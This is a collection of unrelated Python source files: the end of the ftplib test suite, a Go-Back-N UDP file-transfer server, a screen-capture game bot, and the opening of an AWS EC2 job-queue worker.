self.secure_connection()
def cmd_ccc(self, line):
self.push('220 Reverting back to clear-text')
self._ccc = True
self._do_ssl_shutdown()
def cmd_pbsz(self, line):
"""Negotiate size of buffer for secure data transfer.
For TLS/SSL the only valid value for the parameter is '0'.
Any other value is accepted but ignored.
"""
self.push('200 PBSZ=0 successful.')
def cmd_prot(self, line):
"""Setup un/secure data channel."""
arg = line.upper()
if arg == 'C':
self.push('200 Protection set to Clear')
self.secure_data_channel = False
elif arg == 'P':
self.push('200 Protection set to Private')
self.secure_data_channel = True
else:
self.push("502 Unrecognized PROT type (use C or P).")
class DummyTLS_FTPServer(DummyFTPServer):
handler = DummyTLS_FTPHandler
class TestFTPClass(TestCase):
def setUp(self, encoding=DEFAULT_ENCODING):
self.server = DummyFTPServer((HOST, 0), encoding=encoding)
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT, encoding=encoding)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
asyncore.close_all(ignore_all=True)
def check_data(self, received, expected):
self.assertEqual(len(received), len(expected))
self.assertEqual(received, expected)
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\r\n0')
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\n0')
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\r0')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, OSError,
EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler_instance.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler_instance.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_cwd(self):
dir = self.client.cwd('/foo')
self.assertEqual(dir, '250 cwd ok')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_abort(self):
self.client.abort()
def test_retrbinary(self):
def callback(data):
received.append(data.decode(self.client.encoding))
received = []
self.client.retrbinary('retr', callback)
self.check_data(''.join(received), RETR_DATA)
def test_retrbinary_rest(self):
def callback(data):
received.append(data.decode(self.client.encoding))
for rest in (0, 10, 20):
received = []
self.client.retrbinary('retr', callback, rest=rest)
self.check_data(''.join(received), RETR_DATA[rest:])
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.check_data(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = io.BytesIO(RETR_DATA.encode(self.client.encoding))
self.client.storbinary('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storbinary_rest(self):
data = RETR_DATA.replace('\r\n', '\n').encode(self.client.encoding)
f = io.BytesIO(data)
for r in (30, '30'):
f.seek(0)
self.client.storbinary('stor', f, rest=r)
self.assertEqual(self.server.handler_instance.rest, str(r))
def test_storlines(self):
data = RETR_DATA.replace('\r\n', '\n').encode(self.client.encoding)
f = io.BytesIO(data)
self.client.storlines('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
f = io.StringIO(RETR_DATA.replace('\r\n', '\n'))
# storlines() expects a binary file, not a text file
with warnings_helper.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises(TypeError, self.client.storlines, 'stor foo', f)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_mlsd(self):
list(self.client.mlsd())
list(self.client.mlsd(path='/'))
list(self.client.mlsd(path='/', facts=['size', 'type']))
ls = list(self.client.mlsd())
for name, facts in ls:
self.assertIsInstance(name, str)
self.assertIsInstance(facts, dict)
self.assertTrue(name)
self.assertIn('type', facts)
self.assertIn('perm', facts)
self.assertIn('unique', facts)
def set_data(data):
self.server.handler_instance.next_data = data
def test_entry(line, type=None, perm=None, unique=None, name=None):
type = 'type' if type is None else type
perm = 'perm' if perm is None else perm
unique = 'unique' if unique is None else unique
name = 'name' if name is None else name
set_data(line)
_name, facts = next(self.client.mlsd())
self.assertEqual(_name, name)
self.assertEqual(facts['type'], type)
self.assertEqual(facts['perm'], perm)
self.assertEqual(facts['unique'], unique)
# plain
test_entry('type=type;perm=perm;unique=unique; name\r\n')
# "=" in fact value
test_entry('type=ty=pe;perm=perm;unique=unique; name\r\n', type="ty=pe")
test_entry('type==type;perm=perm;unique=unique; name\r\n', type="=type")
test_entry('type=t=y=pe;perm=perm;unique=unique; name\r\n', type="t=y=pe")
test_entry('type=====;perm=perm;unique=unique; name\r\n', type="====")
# spaces in name
test_entry('type=type;perm=perm;unique=unique; na me\r\n', name="na me")
test_entry('type=type;perm=perm;unique=unique; name \r\n', name="name ")
test_entry('type=type;perm=perm;unique=unique; name\r\n', name=" name")
test_entry('type=type;perm=perm;unique=unique; n am e\r\n', name="n am e")
# ";" in name
test_entry('type=type;perm=perm;unique=unique; na;me\r\n', name="na;me")
test_entry('type=type;perm=perm;unique=unique; ;name\r\n', name=";name")
test_entry('type=type;perm=perm;unique=unique; ;name;\r\n', name=";name;")
test_entry('type=type;perm=perm;unique=unique; ;;;;\r\n', name=";;;;")
# case sensitiveness
set_data('Type=type;TyPe=perm;UNIQUE=unique; name\r\n')
_name, facts = next(self.client.mlsd())
for x in facts:
self.assertTrue(x.islower())
# no data (directory empty)
set_data('')
self.assertRaises(StopIteration, next, self.client.mlsd())
set_data('')
for x in self.client.mlsd():
self.fail("unexpected data %s" % x)
def test_makeport(self):
with self.client.makeport():
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd,
'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd, 'pasv')
def test_with_statement(self):
self.client.quit()
def is_client_connected():
if self.client.sock is None:
return False
try:
self.client.sendcmd('noop')
except (OSError, EOFError):
return False
return True
# base test
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.assertTrue(is_client_connected())
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# QUIT sent inside the with block
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.client.quit()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# force a wrong response code to be sent on QUIT: error_perm
# is expected and the connection is supposed to be closed
try:
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.server.handler_instance.next_response = '550 error on quit'
except ftplib.error_perm as err:
self.assertEqual(str(err), '550 error on quit')
else:
self.fail('Exception not raised')
# needed to give the threaded server some time to set the attribute
# which otherwise would still be == 'noop'
time.sleep(0.1)
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
def test_source_address(self):
self.client.quit()
port = socket_helper.find_unused_port()
try:
self.client.connect(self.server.host, self.server.port,
source_address=(HOST, port))
self.assertEqual(self.client.sock.getsockname()[1], port)
self.client.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_source_address_passive_connection(self):
port = socket_helper.find_unused_port()
self.client.source_address = (HOST, port)
try:
with self.client.transfercmd('list') as sock:
self.assertEqual(sock.getsockname()[1], port)
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_parse257(self):
self.assertEqual(ftplib.parse257('257 "/foo/bar"'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 "/foo/bar" created'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 ""'), '')
self.assertEqual(ftplib.parse257('257 "" created'), '')
self.assertRaises(ftplib.error_reply, ftplib.parse257, '250 "/foo/bar"')
# The 257 response is supposed to include the directory
# name and in case it contains embedded double-quotes
# they must be doubled (see RFC-959, chapter 7, appendix 2).
self.assertEqual(ftplib.parse257('257 "/foo/b""ar"'), '/foo/b"ar')
self.assertEqual(ftplib.parse257('257 "/foo/b""ar" created'), '/foo/b"ar')
def test_line_too_long(self):
self.assertRaises(ftplib.Error, self.client.sendcmd,
'x' * self.client.maxline * 2)
def test_retrlines_too_long(self):
self.client.sendcmd('SETLONGRETR %d' % (self.client.maxline * 2))
received = []
self.assertRaises(ftplib.Error,
self.client.retrlines, 'retr', received.append)
def test_storlines_too_long(self):
f = io.BytesIO(b'x' * self.client.maxline * 2)
self.assertRaises(ftplib.Error, self.client.storlines, 'stor', f)
def test_encoding_param(self):
encodings = ['latin-1', 'utf-8']
for encoding in encodings:
with self.subTest(encoding=encoding):
self.tearDown()
self.setUp(encoding=encoding)
self.assertEqual(encoding, self.client.encoding)
self.test_retrbinary()
self.test_storbinary()
self.test_retrlines()
new_dir = self.client.mkd('/non-ascii dir \xAE')
self.check_data(new_dir, '/non-ascii dir \xAE')
# Check default encoding
client = ftplib.FTP(timeout=TIMEOUT)
self.assertEqual(DEFAULT_ENCODING, client.encoding)
@skipUnless(socket_helper.IPV6_ENABLED, "IPv6 not enabled")
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOSTv6, 0),
af=socket.AF_INET6,
encoding=DEFAULT_ENCODING)
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT, encoding=DEFAULT_ENCODING)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
asyncore.close_all(ignore_all=True)
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
with self.client.makeport():
self.assertEqual(self.server.handler_instance.last_received_cmd,
'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
def callback(data):
received.append(data.decode(self.client.encoding))
received = []
self.client.retrbinary('retr', callback)
self.assertEqual(len(''.join(received)), len(RETR_DATA))
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClassMixin(TestFTPClass):
"""Repeat TestFTPClass tests starting the TLS layer for both control
and data connections first.
"""
def setUp(self, encoding=DEFAULT_ENCODING):
self.server = DummyTLS_FTPServer((HOST, 0), encoding=encoding)
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT, encoding=encoding)
self.client.connect(self.server.host, self.server.port)
# enable TLS
self.client.auth()
self.client.prot_p()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClass(TestCase):
"""Specific TLS_FTP class tests."""
def setUp(self, encoding=DEFAULT_ENCODING):
self.server = DummyTLS_FTPServer((HOST, 0), encoding=encoding)
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
asyncore.close_all(ignore_all=True)
def test_control_connection(self):
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
def test_data_connection(self):
# clear text
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(sock.recv(1024),
LIST_DATA.encode(self.client.encoding))
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# secured, after PROT P
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIsInstance(sock, ssl.SSLSocket)
# consume from SSL socket to finalize handshake and avoid
# "SSLError [SSL] shutdown while in init"
self.assertEqual(sock.recv(1024),
LIST_DATA.encode(self.client.encoding))
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# PROT C is issued, the connection must be in cleartext again
self.client.prot_c()
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(sock.recv(1024),
LIST_DATA.encode(self.client.encoding))
self.assertEqual(self.client.voidresp(), "226 transfer complete")
def test_login(self):
# login() is supposed to implicitly secure the control connection
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.login()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
# make sure that AUTH TLS doesn't get issued again
self.client.login()
def test_auth_issued_twice(self):
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
def test_context(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
self.assertRaises(ValueError, ftplib.FTP_TLS, keyfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
keyfile=CERTFILE, context=ctx)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIs(self.client.sock.context, ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIs(sock.context, ctx)
self.assertIsInstance(sock, ssl.SSLSocket)
def test_ccc(self):
self.assertRaises(ValueError, self.client.ccc)
self.client.login(secure=True)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.ccc()
self.assertRaises(ValueError, self.client.sock.unwrap)
@skipUnless(False, "FIXME: bpo-32706")
def test_check_hostname(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.check_hostname, True)
ctx.load_verify_locations(CAFILE)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
# 127.0.0.1 doesn't match SAN
self.client.connect(self.server.host, self.server.port)
with self.assertRaises(ssl.CertificateError):
self.client.auth()
# exception quits connection
self.client.connect(self.server.host, self.server.port)
self.client.prot_p()
with self.assertRaises(ssl.CertificateError):
with self.client.transfercmd("list") as sock:
pass
self.client.quit()
self.client.connect("localhost", self.server.port)
self.client.auth()
self.client.quit()
self.client.connect("localhost", self.server.port)
self.client.prot_p()
with self.client.transfercmd("list") as sock:
pass
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(20)
self.port = socket_helper.bind_port(self.sock)
self.server_thread = threading.Thread(target=self.server)
self.server_thread.daemon = True
self.server_thread.start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
self.old_port = ftplib.FTP.port
ftplib.FTP.port = self.port
def tearDown(self):
ftplib.FTP.port = self.old_port
self.server_thread.join()
# Explicitly clear the attribute to prevent dangling thread
self.server_thread = None
def server(self):
# This method sets the evt two times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
self.sock.listen()
# (1) Signal the caller that we are ready to accept the connection.
self.evt.set()
try:
conn, addr = self.sock.accept()
except socket.timeout:
pass
else:
conn.sendall(b"1 Hola mundo\n")
conn.shutdown(socket.SHUT_WR)
# (2) Signal the caller that it is safe to close the socket.
self.evt.set()
conn.close()
finally:
self.sock.close()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(ftp.sock.gettimeout())
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
# bpo-39259
with self.assertRaises(ValueError):
ftplib.FTP(HOST, timeout=0)
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
class MiscTestCase(TestCase):
def test__all__(self):
not_exported = {
'MSG_OOB', 'FTP_PORT', 'MAXLINE', 'CRLF', 'B_CRLF', 'Error',
'parse150', 'parse227', 'parse229', 'parse257', 'print_line',
'ftpcp', 'test'}
support.check__all__(self, ftplib, not_exported=not_exported)
def test_main():
tests = [TestFTPClass, TestTimeouts,
TestIPv6Environment,
TestTLS_FTPClassMixin, TestTLS_FTPClass,
MiscTestCase]
thread_info = threading_helper.threading_setup()
try:
support.run_unittest(*tests)
finally:
threading_helper.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
GoBackN.py
|
import socket
import math
import time
import threading
from Helpers import PacketState, calc_checksum, lose_the_packet, make_ack_packet, print_progress_bar
PACKET_SIZE = 200
HEADER_SIZE = 12
SERVER_PORT_NO = None
PLP = None
WINDOW_SIZE = None
MAX_SEQ_NO = None
main_lock = threading.Lock()
threads = []
state = {
'base': 0,
'packets': [],
'acks_count': 0
}
# States:
# 0: not sent
# 1: sent
# 2: acked
def start(filename):
global SERVER_PORT_NO, WINDOW_SIZE, MAX_SEQ_NO, PLP
file = open(filename, 'r')
configs = file.read()
configs = configs.split('\n')
SERVER_PORT_NO = int(configs[0].split(':')[1].strip())
WINDOW_SIZE = int(configs[1].split(':')[1].strip())
MAX_SEQ_NO = WINDOW_SIZE
PLP = float(configs[2].split(':')[1].strip())
main_socket = make_socket(SERVER_PORT_NO)
start_listening(main_socket, PACKET_SIZE)
def make_socket(port_no):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('', port_no))
return sock
def start_listening(main_socket, datagram_size):
file_data, address = main_socket.recvfrom(datagram_size)
ack_pkt = make_ack_packet(0)
main_socket.sendto(bytes(ack_pkt, 'UTF-8'), address)
file = open('files/{}'.format(file_data.decode().split('&$')[1]))
file_data = file.read()
no_of_pkts = int(math.ceil(len(file_data) / (PACKET_SIZE - HEADER_SIZE)))
seq_no = 0
step_size = PACKET_SIZE - HEADER_SIZE
for i in range(no_of_pkts):
if no_of_pkts - 1 == i:
current_data = file_data[i*step_size:len(file_data)]
is_final = 1
else:
current_data = file_data[i*step_size:i*step_size+step_size]
is_final = 0
pkt = PacketState(seq_no, 0, is_final, current_data)
state['packets'].append(pkt)
seq_no = (seq_no + 1) % MAX_SEQ_NO
for i in range(min(WINDOW_SIZE, len(state['packets']))):
thread = threading.Thread(target=send_packet, args=(main_socket, state['packets'][i], i, address))
thread.start()
threads.append(thread)
print('Sent first window size')
while True:
rPkt, rAddress = main_socket.recvfrom(PACKET_SIZE)
print('Received ack {}'.format(rPkt.decode()))
thread = threading.Thread(target=handle_received_packet, args=(main_socket, rPkt, rAddress))
thread.start()
threads.append(thread)
check_if_thread_finished()
def send_packet(sock, pkt, pkt_index, address):
main_lock.acquire()
if state['packets'][pkt_index].status != 2:
sock.sendto(bytes(pkt.packet, 'UTF-8'), address)
else:
main_lock.release()
return
pkt.status = 1
main_lock.release()
time.sleep(0.1)
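# The 100 ms sleep above acts as the retransmission timer: if the window
# base is still unacknowledged when we wake up, Go-Back-N resends every
# packet currently in the window (the loop below).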
main_lock.acquire()
if int(state['base']) == int(pkt_index) and state['packets'][pkt_index].status != 2:  # still unacknowledged: resend the window
    for i in range(state['base'], min(state['base'] + WINDOW_SIZE, len(state['packets']))):
if not lose_the_packet(PLP):
thread = threading.Thread(target=send_packet, args=(sock, state['packets'][i], i, address))
thread.start()
threads.append(thread)
main_lock.release()
return
def handle_received_packet(sock, packet, address):
received_seq_no = packet.decode().split('&')[1]
main_lock.acquire()
if int(state['packets'][state['base']].seq_no) == int(received_seq_no):
state['packets'][state['base']].status = 2
state['acks_count'] += 1
state['base'] += 1
print_progress_bar(state['acks_count'], len(state['packets']))
main_lock.release()
main_lock.acquire()
base = state['base']
last_index = base + WINDOW_SIZE - 1
if last_index < len(state['packets']) and state['packets'][last_index].status == 0:
main_lock.release()
thread = threading.Thread(target=send_packet, args=(sock, state['packets'][last_index], last_index, address))
thread.start()
threads.append(thread)
else:
main_lock.release()
main_lock.acquire()
if state['acks_count'] == len(state['packets']):
print('File Successfully Sent.')
main_lock.release()
return
def valid_ack(packet):
return calc_checksum(packet.decode()) == packet.decode().split('&')[0]
def check_if_thread_finished():
    # Join finished threads; iterate over a copy because we mutate the list.
    for th in threads[:]:
        if not th.is_alive():
            threads.remove(th)
            th.join()
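# Minimal usage sketch (assumed entry point, not part of the original
# module). start() reads three "key: value" lines in this order: server
# port, window size, packet-loss probability (PLP). A hypothetical
# server_config.txt:
#
#   port: 8080
#   window size: 4
#   plp: 0.1
if __name__ == '__main__':
    start('server_config.txt')  # hypothetical config file name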
|
main.py
|
import cv2
import pyautogui
import time
import numpy as np
import keyboard
from sentdex import PressKey, ReleaseKey, W, A, S, D
import imutils
import threading
CHARACTER_POSITION = [190, 301]
CAPTURE_AREA = ((433, 400), (950, 893))
QUIT = False # We loop in-game until this is set to True.
ALLOWED_KEYS = {W, A, S, D}
# Remove the key from the list of allowed keys for a given interval.
def hold_key(key):
global ALLOWED_KEYS
ALLOWED_KEYS.discard(key)  # discard: tolerate concurrent holds of the same key
time.sleep(0.250)
ALLOWED_KEYS.add(key)
def terminate_program():
global QUIT
QUIT = True
exit(0)
# Get the center of different objects on the image.
def get_object_locations_from_image(img, object_pixels_x, object_pixels_y, min_radius):
mask = np.zeros(img.shape, dtype=np.uint8)
mask[object_pixels_y, object_pixels_x] = [255, 255, 255]
mask = cv2.dilate(mask, None, iterations=2)
mask = cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY)
cnts = cv2.findContours(mask, cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
coordinates = []
for c in cnts:
((x, y), radius) = cv2.minEnclosingCircle(c)
M = cv2.moments(c)
if M["m00"] == 0:
    continue  # degenerate contour: avoid division by zero
center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"]))
if radius > min_radius: #and center[0] > CHARACTER_POSITION[0]:
coordinates.append((center[0], center[1]))
return coordinates
keyboard.add_hotkey('c', terminate_program)
time.sleep(2)
while not QUIT:
img = np.array(pyautogui.screenshot())[CAPTURE_AREA[0][1]:CAPTURE_AREA[1][1], CAPTURE_AREA[0][0]:CAPTURE_AREA[1][0], :]
# Filter the red and yellow pixels from the image.
red_vertex_indices = np.where((img[:, :, 0] > 150) & (img[:, :, 1] < 40) & (img[:, :, 1] > 20) & (img[:, :, 2] > 40))
star_vertex_indices = np.where((img[:, :, 0] > 240) & (img[:, :, 1] > 230) & (img[:, :, 2] < 90))
y_coords_apple, x_coords_apple = red_vertex_indices
y_coords_star, x_coords_star = star_vertex_indices
# Get the center points of the objects.
apple_coordinates = get_object_locations_from_image(img, x_coords_apple, y_coords_apple, min_radius=20.5)
star_coordinates = get_object_locations_from_image(img, x_coords_star, y_coords_star, min_radius=13)
OBJECTS = []
# Calculate the distance of each object relative to the character's position.
for x_coord, y_coord in apple_coordinates + star_coordinates:
OBJECTS.append({"location": (x_coord, y_coord), "distance_horizontal": (x_coord - CHARACTER_POSITION[0])})
if len(OBJECTS) > 0:
closest_objective = min(OBJECTS, key=lambda x: x["distance_horizontal"])
x, y = closest_objective["location"]
horizontal_distance = closest_objective["distance_horizontal"]
vertical_distance = (y - CHARACTER_POSITION[1])
# We only move when the object is in a given radius of our character.
if horizontal_distance < 260 and vertical_distance > -200:
# If the object is behind our character:
if x < CHARACTER_POSITION[0]:
# If there are more objects, we decide if it is safe to focus on catching the star instead of slashing forward for example.
if len(OBJECTS) > 1:
temp = list(OBJECTS)
temp.remove(closest_objective)
second_closest_objective = min(temp, key=lambda x: x["distance_horizontal"])
condition = 3 * horizontal_distance < second_closest_objective["distance_horizontal"]
else:
condition = True
if vertical_distance < 30 and vertical_distance > - 100:
# If it is safe to catch the star:
if condition:
key = A
# We don't move if it is not safe to do so. Instead, we hold the 'A' key so that we can focus on the apples in the next iteration.
else:
threading.Thread(target=hold_key, args=(A,)).start()
continue
else:
continue
elif y < CHARACTER_POSITION[1] - 45:
key = W
elif y > CHARACTER_POSITION[1] + 45:
key = S
else:
key = D
if key in ALLOWED_KEYS:
threading.Thread(target=hold_key, args=(key,)).start()
PressKey(key)
ReleaseKey(key)
|
instance.py
|
#!/usr/bin/env python
# encoding: utf-8
"""
instance.py - manage the behaviour on an individual instance
Created by Dave Williams on 2016-07-05
"""
import sys
import os
import traceback
import time
import optparse
import urllib.request
import urllib.error
import multiprocessing as mp
import boto
from . import run
## Reporting to SQS
# This is a bit hacky and I don't like it
try:
with urllib.request.urlopen(
'http://169.254.169.254/latest/meta-data/public-ipv4',
timeout=3) as response:
ip4 = response.read().decode()
log_to_sqs=True
sqs = boto.connect_sqs()
logging_queue = sqs.get_queue('status-queue')
except urllib.error.URLError:
log_to_sqs=False
## Helper functions
def log_it(log_message):
"""Write message to console so that it can be viewed from EC2 monitor"""
identified_message = "instance.py :" + mp.current_process().name + \
" ## " + log_message
print(identified_message)
with open('/dev/console', 'w') as console:
console.write(identified_message + '\n')
if log_to_sqs:
oclock = time.strftime('%a,%H:%M') + " - "
msg = oclock + ip4 + " - "+mp.current_process().name+": "+log_message
logging_queue.write(logging_queue.new_message(msg))
def fatal_error(error_log_message, feed_me = "differently", shutdown=False):
"""Log a message likely to have torpedoed the run"""
log_it("ERROR: " + error_log_message)
log_it("SHUTTING DOWN: feed me " + feed_me + " next time")
if shutdown:
halt_system()
def running_error(exception):
"""An error that occured while running a job"""
log_it("### An error occurred while running jobs")
log_it("Exception of type " + str(type(exception)) +
": " + exception.message)
exc_type, exc_value, exc_traceback = sys.exc_info()
log_it(repr(traceback.format_exception(exc_type, exc_value, exc_traceback)))
def halt_system():
"""Shut it down"""
os.system("shutdown now -h")
## Munch tasks off a queue
class queue_eater(object):
def __init__(self, sqs_queue_name, id=None, secret=None, shutdown=True):
"""Consume an SQS queue. The queue consists of metafile locations.
These locations are spun off into run.manage instances and the queue
messages are deleted after the run.manage returns.
Parameters
----------
sqs_queue_name: string
name of the queue to eat
id: string
optional AWS id access key
secret: string
optional AWS secret key
shutdown: boolean
if True, will shutdown on errors
"""
self.name = sqs_queue_name
self.id = id
self.secret = secret
self.should_shutdown = shutdown
self._connect_to_queue()
self.new_meta() # Load first meta msg
try:
if self.meta is not None: # in case queue is empty
self.new_proc()
while self.meta is not None:
if not self.proc_alive():
if self.process.exitcode==0:
self.delete_meta()
self.new_meta()
if self.meta is not None:
self.new_proc()
except Exception as e:
running_error(e)
self.shutdown()
log_it("Ate all we can, queue eater out")
return
def _connect_to_queue(self):
"""Connect to our sqs queue"""
try:
log_it("Connecting to SQS queue "+self.name)
sqs = boto.connect_sqs(self.id, self.secret)
self.queue = sqs.get_queue(self.name)
